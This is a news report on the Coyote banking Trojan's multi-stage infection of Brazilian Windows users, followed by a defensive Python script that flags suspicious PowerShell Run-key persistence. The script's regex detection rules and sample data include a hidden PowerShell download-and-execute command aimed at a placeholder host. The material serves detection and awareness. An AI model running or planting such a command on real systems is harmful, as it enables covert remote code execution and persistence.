Windows users in Brazil have recently been targeted by a new cyber attack involving the distribution of the Coyote banking Trojan. This malware is capable of targeting more than 70 financial applications and operates through a complex multi-stage infection process.
According to experts from Fortinet, the Trojan is highly sophisticated: it can capture keystrokes, take screenshots, and manipulate banking site interfaces to intercept sensitive financial data. The malicious code is distributed through Windows shortcut (LNK) files that contain PowerShell commands.
Coyote was first discovered by Kaspersky Lab in early 2024, when the attack used the Squirrel installer to launch a Node.js application built on Electron, followed by a malicious payload written in Nim.
In the updated version of the infection process, the malware is spread through LNK files that run PowerShell commands and fetch an additional script from a remote server. This script is then executed by an intermediate loader responsible for running the main malicious code.
Subsequently, the Donut tool is used to decrypt and run an executable file in MSIL (Microsoft Intermediate Language). To maintain a persistent presence on the system, Coyote modifies the Windows registry by creating a value under the HKCU\Software\Microsoft\Windows\CurrentVersion\Run key. This value triggers a hidden PowerShell command to download and execute encrypted code from a remote source.
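As an added defensive illustration, not code from the Fortinet or Kaspersky research, the following Python audits Run-key values for the persistence pattern described above: PowerShell started hidden from a Run value that then fetches and executes remote code. The regex rules, the suspicion threshold and the sample entries (including the placeholder host example.invalid) are this example's own constructions, not indicators from the report.

```python
import re
from typing import Dict, List

# Heuristics for the persistence described above: a value under
# HKCU\Software\Microsoft\Windows\CurrentVersion\Run that starts PowerShell hidden
# and pulls code from a remote source. Patterns are this example's assumptions, not IoCs.
RULES = {
    "powershell_host": re.compile(r"\b(powershell|pwsh)(\.exe)?\b", re.I),
    "hidden_window": re.compile(r"-w(in|indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-(ep|ex|executionpolicy)\s+bypass", re.I),
    "encoded_command": re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download_cradle": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I),
    "in_memory_exec": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
}
# Any of these alongside a PowerShell host turns a Run value into a finding.
REMOTE_OR_HIDDEN = ("hidden_window", "download_cradle", "in_memory_exec", "encoded_command")

def inspect_run_value(command: str) -> List[str]:
    """Labels of every heuristic that matches one Run-key command line."""
    return [label for label, pat in RULES.items() if pat.search(command)]

def is_suspicious(labels: List[str]) -> bool:
    """PowerShell in a Run value alone is common on admin workstations; alert only
    when it is also hidden, fetches remote content, runs code in memory or is encoded."""
    return "powershell_host" in labels and any(l in labels for l in REMOTE_OR_HIDDEN)

def audit_run_values(entries: Dict[str, str]) -> Dict[str, List[str]]:
    """Map each suspicious value name to the heuristics it triggered."""
    findings: Dict[str, List[str]] = {}
    for name, command in entries.items():
        labels = inspect_run_value(command)
        if is_suspicious(labels):
            findings[name] = labels
    return findings

# Constructed sample of Run-key values (not real IoCs). "Updater" mimics the hidden
# download-and-execute pattern; the host name is a placeholder.
SAMPLE_RUN_VALUES = {
    "OneDrive": r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "BackupScript": r'powershell.exe -File "C:\Tools\backup.ps1"',
    "Updater": "powershell.exe -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')\"",
}

if __name__ == "__main__":
    for name, labels in audit_run_values(SAMPLE_RUN_VALUES).items():
        print(f"{name}: {', '.join(labels)}")
```

On a Windows host the same functions can be fed the live key by enumerating `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run` with the standard `winreg` module; the regexes are a starting point and should be tuned against the fleet's known-good Run entries.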
Once launched, Coyote gathers information about the targeted device, including details about installed antivirus products, and sends this data to the attackers. The malware also analyzes the system environment to avoid detection in sandboxes and virtual machines.
The latest version of the Trojan has expanded its list of targeted sites and organizations to include over a thousand web resources, such as cryptocurrency exchanges and hotel services. When a user visits any of the listed sites, the malware connects to the attacker’s server and can carry out keylogging, screen capturing, or interface manipulation.
Security researchers emphasize that the multi-stage infection process employed by Coyote makes it particularly perilous. The use of LNK files in the initial stages enables it to evade traditional security measures, while the intricate structure of the malicious code complicates detection and analysis.